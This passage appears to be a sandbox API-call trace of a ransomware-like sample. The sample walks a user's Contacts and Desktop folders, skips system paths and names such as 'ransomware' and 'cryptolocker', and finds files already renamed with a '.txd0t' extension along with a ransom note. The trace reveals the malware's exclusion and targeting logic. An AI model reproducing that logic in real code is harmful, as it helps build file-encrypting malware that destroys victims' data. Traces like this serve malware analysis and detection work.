(lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\wsus\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="crypt_detect") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="cryptolocker") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="ransomware") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\WINDOWS") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files") returned 0x0 [0119.294] GetProcessHeap () returned 0xe30000 [0119.294] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.294] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Contacts", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0119.294] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Contacts", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts\\*") returned="C:\\Users\\FD1HVy\\Contacts\\*" [0119.294] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0119.295] StrCmpW (psz1=".", psz2=".") returned 0 [0119.295] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.295] StrCmpW (psz1="..", psz2=".") returned 1 [0119.295] StrCmpW (psz1="..", psz2="..") returned 0 [0119.295] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.295] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.295] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.295] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.295] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0119.295] GetProcessHeap () returned 0xe30000 [0119.295] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.295] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0119.295] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0119.295] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0119.295] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0119.295] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0119.295] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0119.295] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.295] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.295] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="crypt_detect") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="cryptolocker") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="ransomware") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0119.296] GetProcessHeap () returned 0xe30000 [0119.296] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xef3600 [0119.296] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.296] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\*") returned="C:\\Users\\FD1HVy\\Desktop\\*" [0119.296] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0119.297] StrCmpW (psz1=".", psz2=".") returned 0 [0119.297] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.297] StrCmpW (psz1="..", psz2=".") returned 1 [0119.297] StrCmpW (psz1="..", psz2="..") returned 0 [0119.297] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ae2a3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x506ae2a3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x506ae2a3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.297] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.297] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.297] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.297] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.297] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt" [0119.297] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.297] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.297] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.298] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.298] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.298] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb7b760, ftCreationTime.dwHighDateTime=0x1d5e678, ftLastAccessTime.dwLowDateTime=0x73a94270, ftLastAccessTime.dwHighDateTime=0x1d5e5c8, ftLastWriteTime.dwLowDateTime=0x506ae2a3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x137f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3475V2DB.pdf.txd0t", cAlternateFileName="3475V2~1.TXD")) returned 1 [0119.298] StrCmpW (psz1="3475V2DB.pdf.txd0t", psz2=".") returned 1 [0119.298] StrCmpW (psz1="3475V2DB.pdf.txd0t", psz2="..") returned 1 [0119.298] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="3475V2DB.pdf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t" [0119.298] PathFindExtensionW (pszPath="3475V2DB.pdf.txd0t") returned=".txd0t" [0119.298] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.298] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x355c0030, ftCreationTime.dwHighDateTime=0x1d5e176, ftLastAccessTime.dwLowDateTime=0xab01ed50, ftLastAccessTime.dwHighDateTime=0x1d5e193, ftLastWriteTime.dwLowDateTime=0x506d4431, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11b34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5dJ40KpaZH5gABK Wvl.xls.txd0t", cAlternateFileName="5DJ40K~1.TXD")) returned 1 [0119.298] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls.txd0t", psz2=".") returned 1 [0119.298] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls.txd0t", psz2="..") returned 1 [0119.298] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5dJ40KpaZH5gABK Wvl.xls.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t" [0119.298] PathFindExtensionW (pszPath="5dJ40KpaZH5gABK Wvl.xls.txd0t") returned=".txd0t" [0119.298] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.298] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26738d40, ftCreationTime.dwHighDateTime=0x1d5eddd, ftLastAccessTime.dwLowDateTime=0x866074e0, ftLastAccessTime.dwHighDateTime=0x1d5e9ad, ftLastWriteTime.dwLowDateTime=0x506fa698, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11d96, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5WpFV5we BjOWCFQ_8P.png.txd0t", cAlternateFileName="5WPFV5~1.TXD")) returned 1 [0119.298] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png.txd0t", psz2=".") returned 1 [0119.298] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png.txd0t", psz2="..") returned 1 [0119.298] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5WpFV5we BjOWCFQ_8P.png.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t" [0119.298] PathFindExtensionW (pszPath="5WpFV5we BjOWCFQ_8P.png.txd0t") returned=".txd0t" [0119.298] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.299] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376e3d90, ftCreationTime.dwHighDateTime=0x1d5e688, ftLastAccessTime.dwLowDateTime=0x485dd3a0, ftLastAccessTime.dwHighDateTime=0x1d5e24f, ftLastWriteTime.dwLowDateTime=0x506fa698, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49f1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="7SFq.jpg.txd0t", cAlternateFileName="7SFQJP~1.TXD")) returned 1 [0119.299] StrCmpW (psz1="7SFq.jpg.txd0t", psz2=".") returned 1 [0119.299] StrCmpW (psz1="7SFq.jpg.txd0t", psz2="..") returned 1 [0119.299] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="7SFq.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t" [0119.299] PathFindExtensionW (pszPath="7SFq.jpg.txd0t") returned=".txd0t" [0119.299] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.299] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61556450, ftCreationTime.dwHighDateTime=0x1d5e686, ftLastAccessTime.dwLowDateTime=0xaf323a40, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0x5072091b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x30f9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8dOKYe-qP.odt.txd0t", cAlternateFileName="8DOKYE~1.TXD")) returned 1 [0119.299] StrCmpW (psz1="8dOKYe-qP.odt.txd0t", psz2=".") returned 1 [0119.299] StrCmpW (psz1="8dOKYe-qP.odt.txd0t", psz2="..") returned 1 [0119.299] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="8dOKYe-qP.odt.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t" [0119.299] PathFindExtensionW (pszPath="8dOKYe-qP.odt.txd0t") returned=".txd0t" [0119.299] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.299] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177c8af0, ftCreationTime.dwHighDateTime=0x1d5e304, ftLastAccessTime.dwLowDateTime=0x2eadcbd0, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x50749f18, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14903, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aqQlS_nJ46AyT-L-zj.swf.txd0t", cAlternateFileName="AQQLS_~1.TXD")) returned 1 [0119.299] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf.txd0t", psz2=".") returned 1 [0119.299] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf.txd0t", psz2="..") returned 1 [0119.299] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="aqQlS_nJ46AyT-L-zj.swf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t" [0119.299] PathFindExtensionW (pszPath="aqQlS_nJ46AyT-L-zj.swf.txd0t") returned=".txd0t" [0119.299] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.299] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87888bb0, ftCreationTime.dwHighDateTime=0x1d5e20e, ftLastAccessTime.dwLowDateTime=0xae94e950, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x50749f18, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x948a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="BBeZnteC-7.mp3.txd0t", cAlternateFileName="BBEZNT~1.TXD")) returned 1 [0119.299] StrCmpW (psz1="BBeZnteC-7.mp3.txd0t", psz2=".") returned 1 [0119.299] StrCmpW (psz1="BBeZnteC-7.mp3.txd0t", psz2="..") returned 1 [0119.299] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="BBeZnteC-7.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t" [0119.299] PathFindExtensionW (pszPath="BBeZnteC-7.mp3.txd0t") returned=".txd0t" [0119.300] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.300] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3c340, ftCreationTime.dwHighDateTime=0x1d5e121, ftLastAccessTime.dwLowDateTime=0x9bb095a0, ftLastAccessTime.dwHighDateTime=0x1d5e9f8, ftLastWriteTime.dwLowDateTime=0x5076cdac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5554, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Cb9DBpMZ2 ZiZd.jpg.txd0t", cAlternateFileName="CB9DBP~1.TXD")) returned 1 [0119.300] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg.txd0t", psz2=".") returned 1 [0119.300] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg.txd0t", psz2="..") returned 1 [0119.300] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.300] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Cb9DBpMZ2 ZiZd.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t" [0119.300] PathFindExtensionW (pszPath="Cb9DBpMZ2 ZiZd.jpg.txd0t") returned=".txd0t" [0119.300] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.300] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: 